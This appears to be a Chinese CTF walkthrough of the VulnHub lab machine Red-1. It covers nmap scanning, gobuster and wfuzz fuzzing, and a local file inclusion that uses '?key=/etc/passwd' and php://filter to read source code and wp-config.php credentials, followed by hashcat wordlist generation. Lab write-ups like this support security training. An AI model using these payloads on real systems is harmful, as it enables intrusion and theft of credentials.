攻击源地址:192.168.43.118
主机发现:sudo nmap -sP 192.168.0.1/24
---> 192.168.43.28
端口扫描:sudo nmap -sC -sV -p- 192.168.0.106
---> 开放端口:22,80
---> /wp-admin/ WordPress 5.8.1 Apache 2.4.41 http-robots.txt
浏览器访问:http://192.168.0.106 --> 无css渲染页面
点击页面链接,指向一个http://redrocks.win的地址 -> 修改hosts
浏览器访问:http://redrocks.win --> 显示正常 --> 点击链接
gobuster dir -u http://192.168.43.28 -w /SecLists/Web-Shells/backdoor_list.txt +x .php
--> /NetworkFileManagerPHP.php
浏览器访问 --> 500错误
参数模糊测试:
wfuzz -c -w /SecLists/Discovery/Web-Content/burp-parameter-names.txt -u http://redrocks.win/NetworkFileManagerPHP.php
wfuzz使用:
-w 指定字典 -z 指定payload,例如字典
-c color带颜色显示
-sc 200 显示需要的状态码
-hc 404 隐藏状态码为404的页面
--> key
?key=/etc/passwd
--> john: x:1000:1000:john:/home/john:/bin/bash
--> oxdf: x:1002:1002:,,,:/home/oxdf:/bin/bash
使用伪协议查看源代码:http://redrocks.win/NetworkFileManagerPHP.php?key=php://filter/convert.base64-encode/resource=NetworkFileManagerPHP.php
<?php
$file = $_GET['key'];
if(isset($file))
{
include("$file");
}
else
{
include("NetworkFileManagerPHP.php");
}
/* VGhhdCBwYXNzd29yZCBhbG9uZSB3b24ndCBoZWxwIHlvdSEgSGFzaGNhdCBzYXlzIHJ1bGVzIGFyZSBydWxlcw== */
?>
对注释中的字符串解密:
--> That password alone won't help you! Hashcat says rules are rules
查看wordpress的配置信息:http://redrocks.win/NetworkFileManagerPHP.php?key=php://filter/convert.base64-encode/resource=wp-config.php
--> define( 'DB_USER', 'john' );
--> define( 'DB_PASSWORD', 'R3v_m4lwh3r3_k1nG!!' );
尝试登录ssh失败
使用hashcat创建密码本:hashcat --stdout pass.txt -r /usr/share/hashcat/rules/best64.rule > password.txt
原文始发于微信公众号(北京路劲科技有限公司):靶机练习No.4 VulnHub靶场 Red-1
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论